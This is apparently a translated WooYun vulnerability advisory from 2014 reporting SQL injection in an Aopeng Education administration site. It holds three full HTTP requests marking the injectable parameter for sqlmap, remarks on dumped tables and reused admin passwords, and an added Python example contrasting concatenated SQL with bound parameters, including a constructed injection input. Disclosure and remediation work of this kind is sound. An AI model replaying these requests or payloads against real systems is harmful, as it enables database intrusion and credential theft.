Vulnerability summary

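Bug ID: wooyun-2014-060349

Title: Multiple SQL injection vulnerabilities in an Aopeng Education (奥鹏教育) platform; the exposed data can trigger a chain reaction

Vendor: open.com.cn

Author: 酱油甲

Submitted: 2014-05-12 12:06

Fixed: 2014-06-26 12:06

Published: 2014-06-26 12:06

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]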

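Vulnerability details

Disclosure status:

2014-05-12: Details reported to the vendor; awaiting vendor handling
2014-05-12: Vendor confirmed; details disclosed to the vendor only
2014-05-22: Details disclosed to core white hats and experts in related fields
2014-06-01: Details disclosed to regular white hats
2014-06-11: Details disclosed to intern white hats
2014-06-26: Details disclosed to the public

Brief description:

Multiple SQL injection vulnerabilities in an Aopeng Education (奥鹏教育) platform; the exposed data can trigger a chain reaction

Detailed description:

Injection point 1:
Construct the POST request: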

POST /ajax/Open.Business.Base.AjaxMethod,Open.ashx?_method=GetRecruitBatchListAll&_session=r HTTP/1.1
Host: eduadmin.open.com.cn
Proxy-Connection: keep-alive
Content-Length: 31
Origin: http://eduadmin.open.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Referer: http://eduadmin.open.com.cn/LearningCenter/administer/QQ_Search.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: ASP.NET_SessionId=asj1uonmn040jx550quob0y5; __utma=209232844.700972994.1399801096.1399801096.1399801096.1; __utmb=209232844.1.10.1399801096; __utmc=209232844; __utmz=209232844.1399801096.1.1.utmcsr=baoming.open.com.cn|utmccn=(referral)|utmcmd=referral|utmcct=/search-123'.aspx; looyu_id=55111ad412db9572ffc2f9365616c9ae49_13043%3A2; looyu_13043=v%3A7246cf3d2037150fe84761024427b5fbc5%2Cref%3Ahttp%253A//baoming.open.com.cn/search-123%2527.aspx%2Cr%3A%2Cmon%3Ahttp%3A//m154.looyu.com/monitor

_StudyType=01*
_UniversityCode=


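sqlmap is able to exploit it:

[Screenshot: 1.jpg]


There are a great many data tables:

[Screenshot: 3.jpg]


Downloading part of the data (as proof) shows that,
because the same administrator passwords are reused, this data can be used for credential stuffing, leading to attacks on other systems:
The data shown here has been masked, so please don't worry.

[Screenshot: 4.jpg]


[Screenshot: 5.jpg]


Other places with the same injection vulnerability:
2. Construct the following request: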

POST /ajax/Open.Business.Base.AjaxMethod,Open.ashx?_method=GetSpecialtyList&_session=r HTTP/1.1
Host: eduadmin.open.com.cn
Proxy-Connection: keep-alive
Content-Length: 65
Origin: http://eduadmin.open.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Referer: http://eduadmin.open.com.cn/LearningCenter/administer/QQ_Search.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: ASP.NET_SessionId=asj1uonmn040jx550quob0y5; __utma=209232844.700972994.1399801096.1399801096.1399801096.1; __utmb=209232844.1.10.1399801096; __utmc=209232844; __utmz=209232844.1399801096.1.1.utmcsr=baoming.open.com.cn|utmccn=(referral)|utmcmd=referral|utmcct=/search-123'.aspx; looyu_id=55111ad412db9572ffc2f9365616c9ae49_13043%3A2

_StudyType=01*
_RecruitBatchID=
_LcenterCode=C0901001
_LevelID=


3. Construct the following request:

POST /ajax/Open.Business.Base.AjaxMethod,Open.ashx?_method=GetRecruitBatchListAll&_session=r HTTP/1.1
Host: eduadmin.open.com.cn
Proxy-Connection: keep-alive
Content-Length: 31
Origin: http://eduadmin.open.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Referer: http://eduadmin.open.com.cn/LearningCenter/administer/QQ_Search.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: ASP.NET_SessionId=asj1uonmn040jx550quob0y5; __utma=209232844.700972994.1399801096.1399801096.1399801096.1; __utmb=209232844.1.10.1399801096; __utmc=209232844; __utmz=209232844.1399801096.1.1.utmcsr=baoming.open.com.cn|utmccn=(referral)|utmcmd=referral|utmcct=/search-123'.aspx; looyu_id=55111ad412db9572ffc2f9365616c9ae49_13043%3A2; looyu_13043=v%3A7246cf3d2037150fe84761024427b5fbc5%2Cref%3Ahttp%253A//baoming.open.com.cn/search-123%2527.aspx%2Cr%3A%2Cmon%3Ahttp%3A//m154.looyu.com/monitor

_StudyType=01*
_UniversityCode=

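Proof of vulnerability:

Multiple databases are involved:

[Screenshot: 2.jpg]


The data shown here has been masked, so please don't worry.

[Screenshot: 4.jpg]


[Screenshot: 5.jpg]

Remediation:

Filter the input.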
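
One way to apply the fix to the _StudyType parameter, shown as an added example that is not from the original report or the vendor's code. It goes one step beyond filtering by also binding the value as a query parameter; the table, its schema, the two-digit format check and the use of sqlite3 in place of the real database are all assumptions.

```python
import re
import sqlite3

def make_db():
    # Constructed sample table; the real schema is not shown in the report.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE recruit_batch (id INTEGER, study_type TEXT, name TEXT)")
    db.executemany("INSERT INTO recruit_batch VALUES (?, ?, ?)",
                   [(1, "01", "batch-a"), (2, "01", "batch-b"), (3, "02", "batch-c")])
    return db

def parse_body(body):
    # The requests above send a text/plain body with one key=value pair per line.
    params = {}
    for line in body.splitlines():
        key, sep, value = line.partition("=")
        if sep:
            params[key.strip()] = value.strip()
    return params

def batches_concat(db, body):
    # Before: the value is pasted into the SQL text, so a quote in it rewrites the query.
    study_type = parse_body(body).get("_StudyType", "")
    sql = ("SELECT name FROM recruit_batch WHERE study_type = '"
           + study_type + "' ORDER BY id")
    return [row[0] for row in db.execute(sql)]

STUDY_TYPE_RE = re.compile(r"[0-9]{2}")  # assumed format, inferred from the value 01

def batches_bound(db, body, validate=True):
    # After: check the expected shape, then pass the value as a bound parameter.
    study_type = parse_body(body).get("_StudyType", "")
    if validate and not STUDY_TYPE_RE.fullmatch(study_type):
        raise ValueError("invalid _StudyType")
    sql = "SELECT name FROM recruit_batch WHERE study_type = ? ORDER BY id"
    return [row[0] for row in db.execute(sql, (study_type,))]

if __name__ == "__main__":
    db = make_db()
    good = "_StudyType=01\r\n_UniversityCode="
    hostile = "_StudyType=01' OR '1'='1\r\n_UniversityCode="  # constructed input
    print(batches_concat(db, good))      # two rows for study type 01
    print(batches_concat(db, hostile))   # every row: the WHERE clause was rewritten
    print(batches_bound(db, hostile, validate=False))  # no rows: value is only data
```

The format check rejects malformed values early, but the bound parameter is what keeps the value out of the SQL text even if the check is loosened later.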

Copyright notice: when reposting, please credit the source 酱油甲@乌云 (WooYun)


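Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 18

Confirmed: 2014-05-12 16:47

Vendor reply:

Existing vulnerability, not yet handled

Latest status:

None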